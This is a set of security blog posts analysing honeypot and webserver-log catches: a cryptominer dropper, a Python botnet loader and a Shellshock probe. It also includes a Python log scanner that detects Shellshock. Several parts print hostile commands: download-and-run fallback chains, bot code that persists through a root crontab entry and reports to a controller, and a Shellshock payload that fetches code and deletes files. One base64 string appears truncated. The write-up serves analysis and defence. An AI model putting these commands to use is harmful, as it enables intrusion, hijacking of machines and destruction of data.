sumokoin – cryptonight

Tuesday, February 27th, 2018

Another honeypot entry caught my eye. First, the attack
itself was unusual because the malware download was performed
by a small Python one-liner as a fallback, instead of just running wget or curl:

uname -a
rm -f /tmp/run
if [ `getconf LONG_BIT` -eq 64 ]
then u=""    # 64-bit payload URL; the post omits the URLs
else u=""    # 32-bit payload URL; the post omits the URLs
fi
wget -O /tmp/run "$u"    # "$u" argument assumed; the post shows no URL here
curl -o /tmp/run "$u"    # same fallback chain: wget, then curl, then python
python -c "import urllib;urllib.urlretrieve('$u','/tmp/run')"

Looking into the downloaded binary, one finds a miner for the
cryptocurrency "sumokoin", which uses the "cryptonight" algorithm:



Looking at a blockchain explorer, I currently find no transactions linked
to that address, but that may be due to the privacy-oriented nature of sumokoin ..

Linux Botnet

Wednesday, January 10th, 2018

Another nice SSH honeypot catch:

uname nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CndoaWxlIFRydWU6CiAgICB0cnk6CiAgIC
dlKQogICAgZXhjZXB0OgogICAgICAgIHBhc3MKICAgIHRpbWUuc2xlZXAoMzAwKQ=='))" > /dev/null 2 >& 1 &

That decodes and runs a complete, base64-encoded Python program, which it downloads from

In that program a crontab entry is created for persistence (the dropped program is re-run every six hours as root):

   # excerpt from the decoded program
   if runCodePath not in crontabData:
       f = open("/etc/crontab", "a+")
       f.write("\n0 */6 * * * root %s\n" % runCodePath)

then it uploads data about the compromised server to the herder:

   # excerpt from the decoded program
   my_data = {"key":d.get_key, "name":d.get_name, "os":d.get_platform, "core":d.get_core, "cpu":d.get_cpucount, "cpuuse":d.get_cpuuse, "status":d.get_status}
   f = urllib.urlopen(apiURL, urllib.urlencode(my_data))

and waits for commands (a file to download and execute, or a shell command to run):

   # excerpt from the decoded program
   if data.has_key("download") and data["download"]:
       DownExec(data["download"], task_id)
   if data.has_key("cmd") and data["cmd"]:
       CmdExec(data["cmd"], task_id)

I wonder what would happen if the computer name were a BeEF XSS hook or something similar..?

recently in the webserver log ..

Monday, August 17th, 2015

While strolling through the webserver logs, I found this little asshole..:

- - [16/Aug/2015:21:35:01 +0200] "GET /suspendedpage.cgi HTTP/1.1" 404 494 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget;curl -O;fetch;lwp-download;perl;rm -rf;rm -rf*\""

The script it fetches sets up an IRC connection and waits for commands like
portscan, tcpflood or a reverse shell ..
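As an added example (not from the original post): a small Python scanner for combined-format webserver logs that flags the "() { ... };" function-definition prefix characteristic of Shellshock probes, wherever it appears in the request, referer or user-agent field. The log lines below are constructed for the example, with documentation IP addresses in place of the stripped source IP.

```python
import re

# Apache/nginx "combined" log format. The user-agent group accepts the \"
# escapes Apache writes into the log, which the Shellshock line above contains.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" '
    r'"(?P<agent>(?:[^"\\]|\\.)*)"'
)

# Shellshock marker: an empty function definition "() { ... }" followed by ";"
# and trailing commands, which vulnerable bash versions would execute.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;')


def parse_line(line):
    """Return the named fields of one combined-format log line, or None."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_shellshock(entry):
    """True if any attacker-controlled header field carries the marker."""
    return any(SHELLSHOCK_RE.search(entry[f]) for f in ("request", "referer", "agent"))


def scan(lines):
    """Return (source host, timestamp, request) for every flagged line."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry and is_shellshock(entry):
            hits.append((entry["host"], entry["time"], entry["request"]))
    return hits


# Constructed sample log: the probe from the post (IP replaced), a benign
# request, and a variant that hides the probe in the referer field.
SAMPLE_LOG = [
    r'192.0.2.10 - - [16/Aug/2015:21:35:01 +0200] "GET /suspendedpage.cgi HTTP/1.1" 404 494 "-" '
    r'"() { :;}; /bin/bash -c \"cd /tmp;wget;curl -O;fetch;lwp-download;perl;rm -rf;rm -rf*\""',
    r'198.51.100.7 - - [16/Aug/2015:21:36:12 +0200] "GET /index.html HTTP/1.1" 200 1043 "-" '
    r'"Mozilla/5.0 (X11; Linux x86_64)"',
    r'203.0.113.5 - - [17/Aug/2015:02:11:40 +0200] "GET /cgi-bin/test.cgi HTTP/1.1" 404 280 '
    r'"() { :; }; echo vulnerable" "curl/7.38.0"',
]

if __name__ == "__main__":
    for host, when, request in scan(SAMPLE_LOG):
        print("shellshock probe from %s at %s: %s" % (host, when, request))
```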

Looks like there are still servers out there that are vulnerable to Shellshock ..

DDoS – cheaper than I thought..

Monday, September 29th, 2014

Recently I stumbled upon an advertisement for a DDoS attack service on the Tor network; it was way cheaper than I thought.

25 minutes of 150 Gbps costs only $15; a silver package for 1 hour is available for $20, and a whole week with one hour of downtime per day can be bought as a gold package for only $60. These darknets are really dark these days...

bitbucket decrypt bitcrypt

Friday, February 21st, 2014

The evil bitcrypt malware, which encrypts files on hijacked PCs and offers the decryption key for a payment of 260 €, has a serious flaw in its encryption design, Heise reported.

Fabien Perigaud and Cedric Pernet managed to find out that the RSA key used was 128 decimal digits long instead of 128 bytes, so they were able to factor the 426-bit key in 43 hours.

The free Python script is available here. Cool stuff 🙂